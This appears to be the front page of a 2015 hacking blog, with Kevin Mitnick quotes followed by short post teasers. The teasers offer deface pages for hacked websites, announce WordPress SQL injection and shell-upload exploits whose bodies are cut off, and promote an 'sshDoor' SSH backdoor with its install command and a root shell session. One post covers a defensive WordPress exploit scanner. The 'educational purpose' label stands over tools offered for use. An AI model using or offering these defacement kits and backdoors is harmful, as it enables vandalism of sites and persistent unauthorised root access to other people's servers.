Just Educational Purpose Only For Pentesters And Developers

  • The only Entertainment

    Hacking was the only entertainment that would occupy my mind - like a huge video game, but with real consequences. I could have evaded the FBI a lot longer if I had been able to control my passion for hacking.Kevin Mitnick

    Read More
  • challenge

    I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. Kevin Mitnick

    Read More
  • Computer hacking

    Computer hacking really results in financial losses and hassles. The objectives of terrorist groups are more serious. That is not to say that cyber groups can't access a telephone switch in Manhattan on a day like 9/11, shut it down, and therefore cause more casualties.Kevin Mitnick

    Read More
  • The only Entertainment

    Hacking was the only entertainment that would occupy my mind - like a huge video game, but with real consequences. I could have evaded the FBI a lot longer if I had been able to control my passion for hacking.Kevin Mitnick

    Read More
  • challenge

    I was addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses. Kevin Mitnick

    Read More

Wednesday, April 29, 2015

Best Deface pages Collection

Don't Have Time for designing A Deface page .. ??  dont worry here you can download Best Deface Pages,  Just replace the Name and messgae with your own name and message !! [Click on Download And Copy The Code, Then Use it, for demo you can paste the code on Pastehtml.com How to edit and save it... ?? All html codes are shared on pastebin, copy it and paste in notepad then edit it and save as index.html or anyname.html 1- Tiger M@te's Deface Page,  This Deface page was uploaded on google bangladesh'd domain Google.com.bd  :...

Wordpress Exploit Scanner

This plugin searches the files on your website, and the posts and comments tables of your database for anything suspicious. It also examines your list of active plugins for unusual filenames. It does not remove anything. That is left to the user to do. Latest MD5 hash values for Exploit Scanner: exploit-scanner.php (1.4.4): 9a4bfd1308559c9622f086ef75aaf531 hashes-3.7.3.php: c3b48788de101707239c9e652dcdb4b6 hashes-3.7.4.php: 43709b77e946828ac811065bef976470 hashes-3.7.5.php:...

Wednesday, April 15, 2015

WordPress Video Gallery 2.8 SQL Injection Vulnerability

This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters Show hidden characters ###################### ...

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters Show hidden characters ###################### ...

Friday, April 3, 2015

sshDoor( one of Best ssh backdoor )

 Usage: ./install passwrod port ./install jancok 33   open putty ssh port : 33 login : root password : jancok [root@serv ~]# uname -a;id Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [root@serv ~]#  Download:  Here...